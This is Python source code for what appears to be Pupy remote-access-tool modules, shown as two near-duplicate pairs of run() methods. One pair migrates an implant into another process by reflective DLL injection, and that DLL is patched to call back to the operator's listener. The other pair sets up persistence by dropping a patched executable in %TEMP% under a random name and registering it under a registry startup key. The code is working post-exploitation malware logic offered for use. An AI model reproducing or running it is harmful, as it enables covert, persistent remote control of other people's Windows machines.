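def run(self, args):
    """Migrate the implant into process ``args.pid`` by reflective DLL injection.

    Sequence:
      1. Read the connect-back ``host:port`` the implant is currently using
         (``pupy.get_connect_back_host``) so the injected DLL calls back to
         the same listener.
      2. Ask the remote ``pupwinutils.processes`` helper whether the target
         pid is 64-bit and pick ``payloads/pupyx64.dll`` or
         ``payloads/pupyx86.dll`` to match (a DLL can only be loaded into a
         process of the same bitness).
      3. Patch the connect-back address into that DLL
         (``genpayload.get_edit_binary``) and inject it with
         ``pupy.reflective_inject_dll``.
      4. Poll ``has_proc_migrated`` until the new session appears, copy the
         current session id onto it, then ask the old implant to exit.

    Args:
        args: parsed module arguments. ``args.pid`` is the target process id.
            An optional ``args.timeout`` (seconds) bounds step 4; when absent
            or ``None`` the wait is unbounded, which is the historical
            behaviour.

    Raises:
        RuntimeError: ``args.timeout`` elapsed without a call-back from the
            injected DLL. The DLL has already been injected at that point;
            the original session is deliberately left alive so the operator
            keeps a foothold.
    """
    # psutil is loaded first; pupwinutils.processes presumably depends on it.
    self.client.load_package("psutil")
    self.client.load_package("pupwinutils.processes")

    self.success("looking for configured connect back address ...")
    res = self.client.conn.modules['pupy'].get_connect_back_host()
    # Split on the LAST ':' so a host part containing colons is kept intact.
    host, port = res.rsplit(':', 1)
    self.success("address configured is %s:%s ..." % (host, port))

    self.success("looking for process %s architecture ..." % args.pid)
    processes = self.client.conn.modules['pupwinutils.processes']
    # Normalise to a real bool: the value is forwarded to the injector.
    is_process_64 = bool(processes.is_process_64(args.pid))
    if is_process_64:
        self.success("process is 64 bits")
        dll_name = "pupyx64.dll"
    else:
        self.success("process is 32 bits")
        dll_name = "pupyx86.dll"
    dllbuff = genpayload.get_edit_binary(os.path.join("payloads", dll_name), host, port)

    self.success("injecting DLL in target process %s ..." % args.pid)
    self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, is_process_64)
    self.success("DLL injected !")

    self.success("waiting for a connection from the DLL ...")
    timeout = getattr(args, "timeout", None)
    deadline = None if timeout is None else time.time() + timeout
    while True:
        c = has_proc_migrated(self.client, args.pid)
        if c:
            self.success("got a connection from migrated DLL !")
            # Carry the session id over so the new session replaces this one.
            c.desc["id"] = self.client.desc["id"]
            break
        if deadline is not None and time.time() >= deadline:
            raise RuntimeError(
                "no connection from the migrated DLL after %s seconds" % timeout)
        time.sleep(0.1)

    # Ask the old implant to exit. Its connection normally drops mid-call,
    # so an exception here is expected and intentionally ignored.
    try:
        self.client.conn.exit()
    except Exception:
        pass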
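def run(self, args):
    """Install persistence on the Windows target.

    Only ``args.method == "registry"`` is implemented: a ``payloads/pupyx86.exe``
    patched with the implant's current connect-back ``host:port`` is uploaded
    to ``%TEMP%`` under a random lowercase name and registered with
    ``pupwinutils.persistence.add_registry_startup``. Any other method is
    reported through ``self.error("not implemented")``.

    Args:
        args: parsed module arguments; ``args.method`` selects the technique.

    Notes:
        - The 32-bit executable is used whatever the target's bitness; unlike
          the migrate module, no architecture probe is performed here.
        - The remote file is written in 16000-byte chunks over the RPC
          connection. The handle is closed in a ``finally`` so a failed
          write does not leave an open, half-written file on the target.
        - NOTE(review): a dropped exe in %TEMP% plus a Run key is a widely
          known persistence pattern; expect it to be visible to host defences.
    """
    if args.method != "registry":
        self.error("not implemented")
        return

    self.client.load_package("pupwinutils.persistence")

    # Connect-back address as configured on the live implant. Split on the
    # LAST ':' so a host part containing colons survives.
    res = self.client.conn.modules['pupy'].get_connect_back_host()
    host, port = res.rsplit(':', 1)

    self.info("generating exe ...")
    exebuff = genpayload.get_edit_binary(
        os.path.join("payloads", "pupyx86.exe"), host, port)

    # Random 6-12 letter base name. %TEMP% is expanded on the REMOTE side so
    # it resolves to the target's temp directory, not the operator's.
    name_len = random.randint(6, 12)
    base_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(name_len))
    remote_path = self.client.conn.modules['os.path'].expandvars(
        "%TEMP%\\{}.exe".format(base_name))
    self.info("uploading to %s ..." % remote_path)

    chunk_size = 16000
    rf = self.client.conn.builtin.open(remote_path, "wb")
    try:
        for pos in range(0, len(exebuff), chunk_size):
            rf.write(exebuff[pos:pos + chunk_size])
    finally:
        rf.close()
    self.success("upload successful")

    self.info("adding to registry ...")
    self.client.conn.modules['pupwinutils.persistence'].add_registry_startup(remote_path)
    self.info("registry key added")
    self.success("persistence added !")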
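def run(self, args):
    """Inject a connect-back DLL into ``args.pid`` and hand the session over to it.

    The implant's configured connect-back ``host:port`` is read from
    ``pupy.get_connect_back_host``; the target's bitness is queried through
    ``pupwinutils.processes.is_process_64`` and the matching
    ``payloads/pupyx64.dll`` / ``payloads/pupyx86.dll`` is patched with that
    address (``genpayload.get_edit_binary``) and injected with
    ``pupy.reflective_inject_dll``. The method then polls
    ``has_proc_migrated`` for the new session, copies this session's id onto
    it and asks the old implant to exit.

    Args:
        args: parsed module arguments. ``args.pid`` is the target pid. An
            optional ``args.timeout`` in seconds bounds the wait for the
            call-back; absent/``None`` waits forever (previous behaviour).

    Raises:
        RuntimeError: the timeout elapsed before the injected DLL connected
            back. The DLL is already injected; the old session is kept alive
            so the operator does not lose access.
    """
    # psutil is loaded first; pupwinutils.processes presumably relies on it.
    self.client.load_package("psutil")
    self.client.load_package("pupwinutils.processes")

    self.success("looking for configured connect back address ...")
    connect_back = self.client.conn.modules['pupy'].get_connect_back_host()
    # rsplit keeps any ':' inside the host part together.
    host, port = connect_back.rsplit(':', 1)
    self.success("address configured is %s:%s ..." % (host, port))

    self.success("looking for process %s architecture ..." % args.pid)
    remote_processes = self.client.conn.modules['pupwinutils.processes']
    # The injector receives this flag, so coerce the remote answer to a bool.
    target_is_64 = bool(remote_processes.is_process_64(args.pid))
    if target_is_64:
        self.success("process is 64 bits")
        payload_dll = os.path.join("payloads", "pupyx64.dll")
    else:
        self.success("process is 32 bits")
        payload_dll = os.path.join("payloads", "pupyx86.dll")
    dll_bytes = genpayload.get_edit_binary(payload_dll, host, port)

    self.success("injecting DLL in target process %s ..." % args.pid)
    self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dll_bytes, target_is_64)
    self.success("DLL injected !")

    self.success("waiting for a connection from the DLL ...")
    wait_limit = getattr(args, "timeout", None)
    give_up_at = None if wait_limit is None else time.time() + wait_limit
    while True:
        migrated = has_proc_migrated(self.client, args.pid)
        if migrated:
            self.success("got a connection from migrated DLL !")
            # The new session inherits this session's id.
            migrated.desc["id"] = self.client.desc["id"]
            break
        if give_up_at is not None and time.time() >= give_up_at:
            raise RuntimeError(
                "no connection from the migrated DLL after %s seconds" % wait_limit)
        time.sleep(0.1)

    # Best effort: the old implant's connection usually dies during exit(),
    # so any exception is expected and ignored on purpose.
    try:
        self.client.conn.exit()
    except Exception:
        pass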
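def run(self, args):
    """Add registry-based persistence on the Windows target.

    Supported only for ``args.method == "registry"``: generate
    ``payloads/pupyx86.exe`` patched with the implant's current connect-back
    ``host:port``, upload it to ``%TEMP%\\<random>.exe`` on the target and
    register that path with ``pupwinutils.persistence.add_registry_startup``.
    Other methods are reported with ``self.error("not implemented")``.

    Args:
        args: parsed module arguments; ``args.method`` selects the technique.

    Notes:
        - Always the 32-bit executable; the target's bitness is not checked
          here, in contrast with the migrate module.
        - The upload is chunked (16000 bytes per write) over the RPC channel;
          the remote handle is released in ``finally`` so an interrupted
          write cannot leak it or leave the file open.
        - NOTE(review): exe in %TEMP% + Run key is a well-known persistence
          technique and is likely to be noticed by host-based defences.
    """
    if args.method != "registry":
        self.error("not implemented")
        return

    self.client.load_package("pupwinutils.persistence")

    # Current connect-back address of the implant; rsplit on the last ':'
    # keeps a host that itself contains colons intact.
    connect_back = self.client.conn.modules['pupy'].get_connect_back_host()
    host, port = connect_back.rsplit(':', 1)

    self.info("generating exe ...")
    exe_bytes = genpayload.get_edit_binary(
        os.path.join("payloads", "pupyx86.exe"), host, port)

    # 6-12 random lowercase letters; expandvars runs on the target so %TEMP%
    # is the target's temp directory.
    letters = [random.choice(string.ascii_lowercase) for _ in range(random.randint(6, 12))]
    remote_path = self.client.conn.modules['os.path'].expandvars(
        "%TEMP%\\{}.exe".format(''.join(letters)))
    self.info("uploading to %s ..." % remote_path)

    chunk_size = 16000
    remote_file = self.client.conn.builtin.open(remote_path, "wb")
    try:
        for offset in range(0, len(exe_bytes), chunk_size):
            remote_file.write(exe_bytes[offset:offset + chunk_size])
    finally:
        remote_file.close()
    self.success("upload successful")

    self.info("adding to registry ...")
    persistence = self.client.conn.modules['pupwinutils.persistence']
    persistence.add_registry_startup(remote_path)
    self.info("registry key added")
    self.success("persistence added !")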